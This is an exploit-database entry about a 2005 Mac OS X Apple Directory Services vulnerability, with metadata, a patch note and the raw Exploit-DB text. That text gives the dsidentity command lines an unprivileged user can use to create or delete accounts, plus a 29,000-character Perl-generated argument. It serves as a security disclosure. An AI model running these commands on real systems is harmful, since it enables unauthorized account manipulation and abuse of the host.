header-logo
Suggest Exploit
vendor:
Mac OS X
by:
Kevin Finisterre
5.5
CVSS
MEDIUM
Account Creation and Deletion
798
CWE
Product Name: Mac OS X
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE:
CPE: o:apple:mac_os_x
Metasploit:
Other Scripts:
Platforms Tested: Mac
2005

Apple Directory Services Account Creation and Deletion Vulnerability

Unprivileged users can create or delete directory services identity accounts in Apple Directory Services.

Mitigation:

Apply the appropriate security updates provided by Apple.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14630/info

A vulnerability in Apple Directory Services allows unprivileged users to create or delete directory services idnetity accounts.

This issue was originally described in BID 14567 Apple Mac OS X Multiple Vulnerabilities. It is now being assigned its own BID. 

To create an account named 'Username' with the password 'pass':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a Username -s pass -v

To delete an account named 'Username':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -r Username -v

To create multiple accounts:
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a `perl -e 'print "A" x 29000'`

Navigation

Suggest Exploit

Services By CQR